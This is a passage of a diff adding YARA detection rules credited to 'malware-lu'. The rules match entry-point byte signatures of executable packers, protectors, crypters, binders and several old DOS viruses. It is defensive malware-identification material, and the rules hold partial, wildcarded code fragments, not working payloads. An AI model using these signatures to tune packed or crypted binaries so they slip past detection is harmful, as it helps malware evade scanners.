FF FF FF FF 01 00 00 00 31 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SexeCrypter11bysantasdad
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC 53 56 57 33 C0 89 45 EC B8 D8 39 00 10 E8 30 FA FF FF 33 C0 55 68 D4 3A 00 10 64 FF 30 64 89 ?? ?? ?? ?? E4 3A 00 10 A1 00 57 00 10 50 E8 CC FA FF FF 8B D8 53 A1 00 57 00 10 50 E8 FE FA FF FF 8B F8 53 A1 00 57 00 10 50 E8 C8 FA FF FF 8B D8 53 E8 C8 FA FF FF 8B F0 85 F6 74 26 8B D7 4A B8 14 57 00 10 E8 AD F6 FF FF B8 14 57 00 10 E8 9B F6 FF FF 8B CF 8B D6 E8 DA FA FF FF 53 E8 84 FA FF FF 8D 4D EC BA F8 3A 00 10 A1 14 57 00 10 E8 0A FB FF FF 8B 55 EC B8 14 57 00 10 E8 65 F5 FF FF B8 14 57 00 10 E8 63 F6 FF FF E8 52 FC FF FF 33 C0 5A 59 59 64 89 10 68 DB 3A 00 10 8D 45 EC E8 ED F4 FF FF C3 E9 83 EF FF FF EB F0 5F 5E 5B E8 ED F3 FF FF 00 53 45 54 54 49 4E 47 53 00 00 00 00 FF FF FF FF 12 00 00 00 6B 75 74 68 37 36 67 62 62 67 36 37 34 76 38 38 67 79 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxGotcha879
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5B 81 EB ?? ?? 9C FC 2E ?? ?? ?? ?? ?? ?? ?? 8C D8 05 ?? ?? 2E ?? ?? ?? ?? 50 2E ?? ?? ?? ?? ?? ?? 8B C3 05 ?? ?? 8B F0 BF 00 01 B9 20 00 F3 A4 0E B8 00 01 50 B8 DA DA CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MZ0oPE106bTaskFall
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB CA 89 03 83 C3 04 87 FE 32 C0 AE 75 FD 87 FE 80 3E FF 75 E2 46 5B 83 C3 04 53 8B 1B 80 3F FF 75 C9 8B E5 61 68 ?? ?? ?? ?? C3 }
+	$a1 = { EB CA 89 03 83 C3 04 87 FE 32 C0 AE 75 FD 87 FE 80 3E FF 75 E2 46 5B 83 C3 04 53 8B 1B 80 3F FF 75 C9 8B E5 61 68 ?? ?? ?? ?? C3 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4C 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule SoftDefenderv11xRandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 74 07 75 05 ?? ?? ?? ?? ?? 74 1F 75 1D ?? 68 ?? ?? ?? 00 59 9C 50 74 0A 75 08 ?? 59 C2 04 00 ?? ?? ?? E8 F4 FF FF FF ?? ?? ?? 78 0F 79 0D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv010v012BetaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 48 01 ?? ?? ?? ?? ?? 95 A5 33 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeBorlandDelphi6070FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 53 8B D8 33 C0 A3 00 00 00 00 6A 00 E8 00 00 00 FF A3 00 00 00 00 A1 00 00 00 00 A3 00 00 00 00 33 C0 A3 00 00 00 00 33 C0 A3 00 00 00 00 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule STProtectorV15SilentSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule ASPackv105bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor226minimumprotection
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 68 ?? ?? ?? ?? 58 81 E0 ?? ?? ?? ?? E9 ?? ?? ?? 00 87 0C 24 59 E8 ?? ?? ?? 00 89 45 F8 E9 ?? ?? ?? ?? 0F 83 ?? ?? ?? 00 E9 ?? ?? ?? ?? 87 14 24 5A 57 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 58 81 C0 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? 81 C8 ?? ?? ?? ?? 81 E0 ?? ?? ?? ?? E9 ?? ?? ?? 00 C3 E9 ?? ?? ?? ?? C3 BF ?? ?? ?? ?? 81 CB ?? ?? ?? ?? BA ?? ?? ?? ?? 52 E9 ?? ?? ?? 00 E8 ?? ?? ?? 00 E9 ?? ?? ?? 00 E9 ?? ?? ?? ?? 87 34 24 5E 66 8B 00 66 25 ?? ?? E9 ?? ?? ?? ?? 8B CD 87 0C 24 8B EC 51 89 EC 5D 8B 05 ?? ?? ?? ?? 09 C0 E9 ?? ?? ?? ?? 59 81 C1 ?? ?? ?? ?? C1 C1 ?? 23 0D ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? E9 ?? ?? ?? ?? C3 E9 ?? ?? ?? 00 13 D0 0B F9 E9 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 64 24 08 31 C0 64 8F 05 00 00 00 00 5A E9 ?? ?? ?? ?? 3C A4 0F 85 ?? ?? ?? 00 8B 45 FC 66 81 38 ?? ?? 0F 84 05 00 00 00 E9 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 87 3C 24 5F 31 DB 31 C9 31 D2 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 45 FC 33 C0 89 45 F4 83 7D FC 00 E9 ?? ?? ?? ?? 53 52 8B D1 87 14 24 81 C0 ?? ?? ?? ?? 0F 88 ?? ?? ?? ?? 3B CB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEProtector093CRYPToCRACk
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5B 81 E3 00 FF FF FF 66 81 3B 4D 5A 75 33 8B F3 03 73 3C 81 3E 50 45 00 00 75 26 0F B7 46 18 8B C8 69 C0 AD 0B 00 00 F7 E0 2D AB 5D 41 4B 69 C9 DE C0 00 00 03 C1 75 09 83 EC 04 0F 85 DD 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PellesC300400450EXEX86CRTLIB
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC ?? 53 56 57 89 65 E8 68 00 00 00 02 E8 ?? ?? ?? ?? 59 A3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackv118BasicaPLibAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule vfpexeNcV500WangJianGuo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoiner153Stubengine17GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 33 FD FF FF 50 E8 0D 00 00 00 CC FF 25 08 20 40 00 FF 25 0C 20 40 00 FF 25 10 20 40 00 FF 25 14 20 40 00 FF 25 18 20 40 00 FF 25 1C 20 40 00 FF 25 20 20 40 00 FF 25 24 20 40 00 FF 25 28 20 40 00 FF 25 00 20 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule TheHypersprotectorTheHyper
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC 14 8B FC E8 14 00 00 00 ?? ?? 01 01 ?? ?? 01 01 ?? ?? ?? 00 ?? ?? 01 01 ?? ?? 02 01 5E E8 0D 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 8B 46 04 FF 10 8B D8 E8 0D 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 53 8B 06 FF 10 89 07 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ANDpakk2006DmitryAndreev
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 FC BE D4 00 40 00 BF 00 10 00 01 57 83 CD FF 33 C9 F9 EB 05 A4 02 DB 75 05 8A 1E 46 12 DB 72 F4 33 C0 40 02 DB 75 05 8A 1E 46 12 DB 13 C0 02 DB 75 05 8A 1E 46 12 DB 72 0E 48 02 DB 75 05 8A 1E 46 12 DB 13 C0 EB DC 83 E8 03 72 0F C1 E0 08 AC 83 F0 FF 74 4D D1 F8 8B E8 EB 09 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 13 C9 75 1A 41 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 73 EA 83 C1 02 81 FD 00 FB FF FF 83 D1 01 56 8D 34 2F F3 A4 5E E9 73 FF FF FF C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule Thinstall2628Jtit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 BB 34 1D 00 00 2B C3 50 68 00 00 40 00 68 00 40 00 00 68 BC 00 00 00 E8 C3 FE FF FF E9 99 FF FF FF CC CC CC CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 }
+	$a1 = { E8 00 00 00 00 58 BB 34 1D 00 00 2B C3 50 68 00 00 40 00 68 00 40 00 00 68 BC 00 00 00 E8 C3 FE FF FF E9 99 FF FF FF CC CC CC CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule UPXModifierv01x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1333ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }
+	$a1 = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 2B 27 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PureBasic4xNeilHodgson
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? 00 00 68 00 00 00 00 68 ?? ?? ?? 00 E8 ?? ?? ?? 00 83 C4 0C 68 00 00 00 00 E8 ?? ?? ?? 00 A3 ?? ?? ?? 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 E8 ?? ?? ?? 00 A3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxAugust16thIronMaiden
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA 79 02 03 D7 B4 1A CD 21 B8 24 35 CD 21 5F 57 89 9D 4E 02 8C 85 50 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtector10Xvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 C0 02 EB 01 E9 50 C3 E8 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9 49 75 F1 EB 05 EB F9 EB F0 D6 EB 01 0F 31 F0 EB 0C 33 C8 EB 03 EB 09 0F 59 74 05 75 F8 51 EB F1 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 05 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEPACK099
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 ED 06 80 BD E0 04 00 00 01 0F 84 F2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Freshbindv20gFresh
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 64 A1 00 00 00 00 55 89 E5 6A FF 68 1C A0 41 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXSCRAMBLER306OnToL
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompact2xxBitSumTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinv01Cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
+	$a1 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 B3 28 40 00 8B 42 3C 03 C2 89 85 BD 28 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D D1 28 40 00 53 8F 85 C4 27 40 00 BB ?? 00 00 00 B9 A5 08 00 00 8D BD 75 29 40 00 4F 30 1C 39 FE CB E2 F9 68 2D 01 00 00 59 8D BD AA 30 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 07 4F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D C4 28 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 59 81 C1 1D 00 00 00 52 51 C1 E9 05 23 D1 FF }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule VxEddie2100
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 4F 4F 0E E8 ?? ?? 47 47 1E FF ?? ?? CB E8 ?? ?? 84 C0 ?? ?? 50 53 56 57 1E 06 B4 51 CD 21 8E C3 ?? ?? ?? ?? ?? ?? ?? 8B F2 B4 2F CD 21 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NETexecutableMicrosoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 5F 43 6F 72 45 78 65 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00 00 00 00 00 FF 25 }
+
+condition:
+		$a0
+}
+	
+	
+rule tElockv098
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 25 E4 FF FF 00 00 00 ?? ?? ?? ?? 1E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AZProtect0001byAlexZakaAZCRC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 70 FC 60 8C 80 4D 11 00 70 25 81 00 40 0D 91 BB 60 8C 80 4D 11 00 70 21 81 1D 61 0D 81 00 40 CE 60 8C 80 4D 11 00 70 25 81 25 81 25 81 25 81 29 61 41 81 31 61 1D 61 00 40 B7 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 BE 00 ?? ?? 00 BF 00 00 40 00 EB 17 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 00 00 00 00 FF 25 ?? ?? ?? 00 8B C6 03 C7 8B F8 57 55 8B EC 05 7F 00 00 00 50 E8 E5 FF FF FF BA 8C ?? ?? 00 89 02 E9 1A 01 00 00 ?? 00 00 00 47 65 74 4D 6F 64 75 6C 65 46 69 6C 65 4E 61 6D 65 41 00 47 65 74 56 6F 6C 75 6D 65 49 6E 66 6F 72 6D 61 74 69 6F 6E 41 00 4D 65 73 73 61 67 65 42 6F 78 41 00 45 78 69 74 50 72 6F 63 65 73 73 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 }
+	$a1 = { FC 33 C9 49 8B D1 33 C0 33 DB AC 32 C1 8A CD 8A EA 8A D6 B6 08 66 D1 EB 66 D1 D8 73 09 66 35 20 83 66 81 F3 B8 ED FE CE 75 EB 33 C8 33 D3 4F 75 D5 F7 D2 F7 D1 8B C2 C1 C0 10 66 8B C1 C3 F0 DA 55 8B EC 53 56 33 C9 33 DB 8B 4D 0C 8B 55 10 8B 75 08 4E 4A 83 FB 08 72 05 33 DB 43 EB 01 43 33 C0 8A 04 31 8A 24 13 2A C4 88 04 31 E2 E6 5E 5B C9 C2 0C }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule UPX290LZMAMarkusOberhumerLaszloMolnarJohnReiser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }
+	$a1 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule MEW510Northfox
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv090
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 02 00 00 00 E8 00 E8 00 00 00 00 5E 2B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1258ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 7B 21 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SVKProtectorv132EngPavolCerven
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 06 36 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeSplitter12BillPrisonerTPOC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 95 02 00 00 64 A1 00 00 00 00 83 38 FF 74 04 8B 00 EB F7 8B 40 04 C3 55 8B EC B8 00 00 00 00 8B 75 08 81 E6 00 00 FF FF B9 06 00 00 00 56 56 E8 B0 00 00 00 5E 83 F8 01 75 06 8B C6 C9 C2 04 00 81 EE 00 00 01 00 E2 E5 C9 C2 04 00 55 8B EC 8B 75 0C 8B DE 03 76 3C 8D 76 18 8D 76 60 8B 36 03 F3 56 8B 76 20 03 F3 33 D2 8B C6 8B 36 03 F3 8B 7D 08 B9 0E 00 00 00 FC F3 A6 0B C9 75 02 EB 08 }
+
+condition:
+		$a0
+}
+	
+	
+rule COPv10c1988
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF ?? ?? BE ?? ?? B9 ?? ?? AC 32 ?? ?? ?? AA E2 ?? 8B ?? ?? ?? EB ?? 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv25RetailSlimLoaderBitsumTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? 01 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 32 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Morphinev27Holy_FatherRatter29A
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+	$a1 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 47 65 74 50 72 6F 63 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule diPackerV1XdiProtectorSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0F 00 2D E9 01 00 A0 E3 68 01 00 EB 8C 00 00 EB 2B 00 00 EB 00 00 20 E0 1C 10 8F E2 8E 20 8F E2 00 30 A0 E3 67 01 00 EB 0F 00 BD E8 00 C0 8F E2 00 F0 9C E5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01REALBasicAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 90 90 90 90 90 90 90 90 90 90 50 90 90 90 90 90 00 01 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PPCPROTECT11XAlexeyGorchakov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF 5F 2D E9 20 00 9F E5 00 00 90 E5 18 00 8F E5 18 00 9F E5 00 00 90 E5 10 00 8F E5 01 00 A0 E3 00 00 00 EB 02 00 00 EA 04 F0 1F E5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule nPackV111502006BetaNEOxuinC
+{
+      meta:
+		author="malware-lu"
+strings:
